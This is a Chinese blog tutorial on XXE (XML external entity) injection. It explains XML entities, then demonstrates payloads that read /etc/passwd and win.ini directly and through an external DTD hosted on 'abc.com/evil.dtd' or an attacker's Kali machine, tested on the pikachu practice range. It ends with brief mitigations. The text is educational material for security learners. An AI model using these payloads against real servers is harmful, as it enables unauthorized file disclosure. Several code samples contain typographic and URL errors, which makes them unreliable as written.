【疑难攻关】——XXE漏洞快速入门

news2025/1/25 4:29:03

作者名:Demo不是emo 

主页面链接主页传送门
创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷
座右铭:不要让时代的悲哀成为你的悲哀
专研方向:网络安全,数据结构

每日emo:该怎么开口呢?今晚天气不错,但还是想你了

 

目录

 一:初识XXE漏洞

1.XXE简介 

2.XML概念

二:XML语法简析

1.XML基础语法

2.XML实体 

[1].XML的基本结构 

[2].一般实体 

[3].参数实体

[4].预定义实体

[5].内部实体和外部实体

[6].实例演示

 三:漏洞演示

1.漏洞明析 

[1].例一. 

[2].例二

2.检测漏洞

3.漏洞利用

[1].直接外部实体注入 

[2].间接外部实体注入 

四:漏洞防范


 一:初识XXE漏洞

1.XXE简介 

 XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。

 那有的小伙伴可能就会问了,那XML又是什么呢

2.XML概念

XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。

但是XML和HTML有明显区别如下:   

XML 被设计用来传输和存储数据。 

HTML 被设计用来显示数据。 

二:XML语法简析

1.XML基础语法

先来看一段简单的XML代码

<?xml version=’1.0’?>					//声明XML解析器版本来解析
<person>								//根元素,不一定是person
<name>test</name>						//子元素,意思就是name变量的值是test
<age>20</age>                           //同理
</person>

简单来说XML的语法中,标签就是变量名,标签里面的数据就是变量的值 

但这里也存在一个问题,当数据里出现了尖括号时,就会造成XML数据的解析错误,如下

<name><admin<name>

所以xml语法中也对这种写法最初了规定,即

在XML中某些单独字符,如引号” ‘ & 和 尖括号 都是不允许直接出现在XML文档中(也就是不能直接用刚才那种写法保存这些带有这些单独字符的数据)的,因为XML 解析的时候会分辨不清这种输入到底是数值还是标签

那有什么办法能够保存这些带有特殊字符的数据呢?这就是下面我们要讲的实体 

2.XML实体 

上面的问题必须要解决,所以出现了实体Entity来解决这个问题 实体Entity是一种简单的存储单元就好比xml变量一样可以对它进行赋值﹐并在xml文档中不同的地方对他引用。实体在XML文档中的文档类型定义部分(DTD)被单独定义描述。

[1].XML的基本结构 

上面有一些词可能大家还比较陌生,先简单介绍一些XML基本的结构,由XML声明,DTD部分,XML部分,三部分组成,示意图如下

 DTD部分就是用来定义 XML 文档的合法构建模块的,继续往下看你就明白了

 上面讲到了实体,我们继续来看看

而实体又分为三种,一般实体(通用实体),参数实体,预定义实体 

[2].一般实体 

一般实体的声明<!ENTITY 实体名称 "实体内容">

引用一般实体的方法:&实体名称; 

来看看下面一段使用了一般实体的代码 

<?xml version=’1.0’?>	   // 声明XML解析器版本来解析 

// 运用实体定义变量的写法 
// 即声明一个name变量,值为john
<!DOCTYPE person[         
<!ENTITY name “john”>      
]>				

// 引用一般实体的写法,格式为"&实体名称;"
<person>			      
<name>&name;</name>		   		
<age>20</age>
</person>

范围:普通实体可以在DTD中引用,可以在XML中引用,可以在声明前引用,还可以在实体声明内部引用。 

[3].参数实体

参数实体的声明<!ENTITY % 实体名称  "实体内容">

引用参数实体的方法:%实体名称;

 来看看下面一段使用了参数实体的代码,其实跟一般实体差不多知识%的区别

<?xml version=’1.0’?>       // 声明XML解析器版本来解析 

// 运用参数实体定义变量的写法 
// 即声明一个outer变量,值为John
<!DOCTYPE person[         
<!ENTITY % outer "John">        
%outer;
]>             
 

// 引用参数实体的写法,格式为"%实体名称;"
<person>                  
<name>%name;</name>                   
<age>20</age>
</person>

它必须定义在单独的DTD区域,这种实体相对灵活,这种功能在漏洞利用场景的外部实体注入(XXE)过程中非常有用

[4].预定义实体

 这玩意在XXE漏洞中一般用不到,有兴趣的同学可以去简单了解一下,我这里就不讲了

[5].内部实体和外部实体

上面讲的那些都是内部实体,实体的值来源于内部,而外部实体顾名思义就是引用外部的值,两者的写法也差不多,外部实体仅仅是多了一个SYSTEM,给大家列了个表格这样大家可以更清楚一点,如下

 注意:引入外部的DTD文件时,dtd文件中存放的就是xml代码,并且引用外部实体的时候还可以使用各种伪协议,而不是仅限于http协议 

[6].实例演示

可能有些人还是比较迷糊, 下面分别给出一个内部实体外部实体的例子大家就能看懂了

来看一段内部实体的例子

<?xml version=”1.0”?>
<!DOCTYPE note[
<!ELEMENT note (name)>
<!ENTITY hack3r “hu3sky”>
]>
<note>
<name>&hack3r;</name>
</note>

再来看看外部实体

<?xml version=”1.0”?>
<!DOCTYPE a[
<!ENTITY  name SYSTEM “http://xx.com/aa.dtd”>
]>
<a>
<name>&name;</name>
</a>

 总结一下,内部实体就相当于自己编写DTD内容,而外部实体就相当于引入外部的DTD内容,类似于写JS代码时从外部引入JS文件,这样就能理解了吧,上面的一般实体和参数实体都可以化为外部实体

而XXE漏洞,就存在于外部实体中,我们将恶意代码写入DTD文件中再通过外部实体引入 

 三:漏洞演示

1.漏洞明析 

在这里在复习一下XXE漏洞是什么 

        XXE漏洞就是XML外部实体注入。既然是外部实体注入,那么针对于XXE漏洞肯定就是XML外部实体了。 引入外部实体方式有很多种,比如: 实体ENTITY不仅能用来存储指定数值,他还能从本地文件或者远程文件中调用相关的数据作为后续实体引用。如外部实体(XML External Entity)就是其中之一。 

下面举两个简单的外部实体攻击例子

[1].例一. 

XML内容:
	<?xml version="1.0"?>
	<!DOCTYPE a [
		<!ENTITY % d SYSTEM “file:///etc/passwd”>
        %d;
	]>
	<c>%d;</c>

此时c变量读取的值便是/etc/passwd文件的内容

但这种方式也有问题,就是会涉及到敏感内容,所以还有下面这种攻击方法

[2].例二

XML内容
	<?xml version=’1.0’?>
	<!DOCTYPE a [
			<!ENTITY % d SYSTEM “http://abc.com/evil.dtd”>
	%d;
	]>
	<c>&b;</c>

Evil.dtd内容

	<!ENTITY b SYSTEM “file://etc/passwd”>

该方法通过引入外部的DTD文件,而文件中同样是读取敏感文件的恶意代码,这样被检测的可能性就大大降低 

2.检测漏洞

这里的漏洞环境我们使用的是pikachu这个靶场的XXE关卡,这个靶场应该都有吧,没有的也可以找我拿,打开该靶场的XXE关卡,如下

 可以看到是一个输入框,提示可以接收xml数据

那我们该怎么判断是否存在XXE漏洞呢?其实就是看他是否能够解析XML数据,所以我们直接传入一段XML代码看他能否解析

我们放入下面这段代码

<?xml version = "1.0"?> 
<!DOCTYPE name 
    [ <!ENTITY hacker "test"> ]> 
<name>&hacker;</name>

这段代码都能看懂吧,就是给name变量赋了一个test值,把代码放到输入框中,点击提交,结果如下

 成功提取到test数据,说明有可能存在XXE漏洞

3.漏洞利用

上面已经检测数来存在XXE漏洞了,那应该怎么利用呢,很简单,就是利用我们刚才讲到的,外部实体引用可以使用的——协议

这里也给大家准备了各种语言支持的协议 ,如下

[1].直接外部实体注入 

直接外部实体注入,就是通过协议直接执行恶意命令

因为我是windows主机,这里我们以file协议来读取c:/windows/win.ini配置文件的内容,xml代码如下(注意这里的路径需要改变写法,不然会受到转义的影响)

<?xml version = "1.0"?> 
<!DOCTYPE name 
    [ <!ENTITY hacker SYSTEM "file:///c://windows//win.ini"> 
]> 
<name>&hacker;</name>

将代码放入输入框提交,结果如下:

 成功读取

[2].间接外部实体注入 

这个也比较简单,就会将恶意代码写在DTD文件中,再引入DTD文件,操作如下

1.构造外部dtd文件

打开虚拟机,这里我选择的是kali,进入根目录,创建一个xxx.dtd的文件,内容如下

<!ENTITY hacker SYSTEM "file:///c://windows//win.ini">

2.使两台机器可以互相连接

这里直接打开apache服务就可以达到这个效果了,主要是为了使xml代码能成功引用到kali的dtd文件 

3.构造XML代码

 引用外部实体的xml代码如下(192.168..0.107是我的kali的ip地址),这里用参数实体给大家演示一下

<?xml version = "1.0"?> 
<!DOCTYPE name 
    [ <!ENTITY % a SYSTEM "http:///192.168.0.107/xxx.dtd"> 
    %a;
]> 
<hacker>%a;</hacker>

 效果如下,成功读取

 

四:漏洞防范

 针对于XXE漏洞修复其实只有两点:  

   1、禁止使用外部实体,例如libxml disable_entity_loader(true) 。

   2、过滤用户提交的XML数据,防止出现非法内容。

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/40030.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Redis快速上手神册,17W字详解其实Redis也就那么一回事!

开始使用Redis Redis是一个开源的数据库&#xff0c;经常被用来构建高性能的可扩展网络应用。它使用内存数据库&#xff0c;这使得它比其他数据库更快。 Redis用于我们的应用程序中的短期数据。它经常被用于会话或网页头数。 通过使用内存数据库&#xff0c;我们不需要有大的…

表空间的空间管理算法

存储结构 逻辑结构 物理结构 database tablespace --> datafile segment extent oracle --> os block block 表空间的空间管理&#xff1a; DMT(dictionary management tablespace): LMT(local management tablespace): SQL>…

[计算机毕业设计]远程监督的跨语言实体关系抽取

前言 &#x1f4c5;大四是整个大学期间最忙碌的时光,一边要忙着准备考研,考公,考教资或者实习为毕业后面临的就业升学做准备,一边要为毕业设计耗费大量精力。近几年各个学校要求的毕设项目越来越难,有不少课题是研究生级别难度的,对本科同学来说是充满挑战。为帮助大家顺利通过…

代码随想录算法训练营day57 | 647. 回文子串,516.最长回文子序列

647. 回文子串: 暴力解法&#xff1a;两层for循环&#xff0c;遍历区间起始位置和终止位置&#xff0c;然后判断这个区间是不是回文。时间复杂度&#xff1a;O(n^3). Output Limit Exceeded class Solution:#时间复杂度&#xff1a;O(n^3)def countSubstrings(self, s: s…

线程与进程

目录 1.为什么使用线程&#xff1f; 2.什么是线程&#xff1f; 3.进程和线程的工作原理 3.1 进程 3.2 线程 4.线程安全问题 5.总结&#xff1a;线程和进程的区别&#xff08;面试题&#xff09; 1.为什么使用线程&#xff1f; 线程与进程都是用来解决并发编程问题的&…

推荐 5 个不错的 React Native UI 库

最近在做一个 React Native 的项目&#xff0c;调研了下 UI 库&#xff0c;下面列举 5 个&#xff1a; React Native Elements React Native Element 是相当闻名的 UI 库&#xff0c;它遵循 Material 设计规范&#xff0c;同时你还可以精细地控制每一个组件。 TL;DR 22.2k G…

朴素贝叶斯——垃圾邮件过滤

文章目录利用朴素贝叶斯进行文档分类1、获取数据集2、切分文本3、构建词表和分类4、构建分类器5、测试算法利用朴素贝叶斯进行垃圾邮件过滤1、导入数据集2、垃圾邮件预测总结利用朴素贝叶斯进行文档分类 1、获取数据集 下载数据集&#xff0c;获取到一些邮件文档。其中ham文件…

Intersoft WebUI Studio for asp.net/asp.mvc

企业 Web 开发的终极工具集。WebUI 建立在坚实的框架之上&#xff0c;为 ASP.NET 提供创新和先进的 40 多个优质 UI 组件&#xff0c;让您轻松及时地构建强大的业务 Web 应用程序。 不仅仅是全面的 UI 工具集。 在提供业界最佳网络体验的愿景的支持下&#xff0c;WebUI 提供了前…

AQS源码解析 8.共享模式_Semaphore信号量

AQS源码解析—共享模式_Semaphore信号量 简介 synchronized 可以起到锁的作用&#xff0c;但某个时间段内&#xff0c;只能有一个线程允许执行。 Semaphore&#xff08;信号量&#xff09;用来限制能同时访问共享资源的线程上限&#xff0c;非重入锁。 Semaphore 是什么&am…

377. 组合总和 Ⅳ【完全背包】求排列数:外层for背包,内层for物品;求组合数:外层for物品,内层for背包;

377. 组合总和 Ⅳ 给你一个由 不同 整数组成的数组 nums &#xff0c;和一个目标整数 target 。请你从 nums 中找出并返回总和为 target 的元素组合的个数。 题目数据保证答案符合 32 位整数范围。 示例 1&#xff1a; 输入&#xff1a;nums [1,2,3], target 4 输出&#x…

如何利用快解析远程访问家庭智能网关

随着家庭宽带用户的暴增&#xff0c;涌现出了许多连接家居设备和控制中心的产品&#xff0c;如家庭智能网关。家庭智能网关是家居智能化的心脏&#xff0c;通过它实现系统的信息采集、信息输入、信息输出、集中控制、远程控制、联动控制等功能。 ​ 智能家庭网关具备智能家居控…

springcloud24:分布式事务 Seata处理分布式事务总结篇

分布式事务&#xff1a; 分布式事务的问题&#xff1a; 1:1 一个servlet 对应一个 数据库1&#xff1a;N 一个servlet对应多个数据库N&#xff1a;N 多个servlet对应多个数据库 全局事务一致性问题&#xff08;全局数据一致性的保证&#xff09; Seata是分布式事务的解决方案 分…

Python标准库之os

1. OS标准库简介 顾名思义&#xff0c;OS表示Operating System&#xff0c;即操作系统。OS标准库是一个操作系统接口模块&#xff0c;提供一些方便使用操作系统相关功能的函数&#xff0c;具体安装位置可通过导入os模块查看os.__file__属性得到。当需要在Python代码中调用OS相…

WPF-页面-DataGrid数据处理-多线程-Winform嵌入

页面 if(NavigationService.CanGoBack true) NavigationService.GoBack(); NavigationService.Navigate(new Uri("Page.xaml",UriKind.Relative));打印对话框PrintDialog如果要一下启动两个窗口&#xff0c;可以重写App.cs中的OnStartUP方法设置窗口所属关系&#…

【我的渲染技术进阶之旅】你知道数字图像处理的标准图上的女孩子是谁吗?背后的故事你了解吗?为啥这张名为Lenna的图会成为数字图像处理的标准图呢?

文章目录一、先来看一张神图&#xff1a;Lenna图二、图片中的妹子是谁&#xff1f;三、为何要使用Lenna图像&#xff1f;四、谁制作了Lenna图像&#xff1f;五、人红是非多六、福利时间七、岁月神偷文末有福利 一、先来看一张神图&#xff1a;Lenna图 想必所有搞过图像处理的人…

LQ0265 汉诺塔【水题】

题目来源&#xff1a;蓝桥杯2012初赛 Java A组C题 题目描述 本题为填空题&#xff0c;只需要算出结果后&#xff0c;在代码中使用输出语句将所填结果输出即可。 汉诺塔&#xff08;又称河内塔&#xff09;问题是源于印度一个古老传说的益智玩具。 大梵天创造世界的时候做了三…

Map和Set常见操作汇总

作者&#xff1a;~小明学编程 文章专栏&#xff1a;Java数据结构 格言&#xff1a;目之所及皆为回忆&#xff0c;心之所想皆为过往 目录 Map 介绍 什么是Map&#xff1f; Map.Entry,> 常用方法 代码 Map中的注意点总结 Set 常见方法汇总 Set中的注意点总结 Map …

Ngxin--源码分析 缓冲区链表

1.基本数据结构 在处理 TCP/HTTP 请求时会经常创建多个缓冲区来存放数据&#xff0c; Nginx缓冲区块简单地组织一个单向链表struct ngx_chain_s {ngx_buf_t *buf;ngx_chain_t *next; };buf: 缓冲区指针 next 下一个链表节点 注意&#xff1a; ngx_chain_t是…

自定义数据类型:结构体、枚举、联合

个人主页&#xff1a;平行线也会相交 欢迎 点赞&#x1f44d; 收藏✨ 留言✉ 加关注&#x1f493;本文由 平行线也会相交 原创 收录于专栏【C/C】 目录结构体结构体类型的声明结构的自引用结构体变量的定义和初始化结构体内存对齐练习1练习2&#xff08;结构体嵌套问题&#x…

JSP表达式(EL)

一、介绍&#xff1a; EL&#xff08;Expression Language&#xff09;可用来代替JSP中的各类脚本&#xff0c;提高编程的灵活度&#xff0c;简化代码的编写。 二、EL的限制&#xff1a; 不能声明变量&#xff0c;需要使用JSTL或者JavaBean Action设置变量。 三、EL的标准格…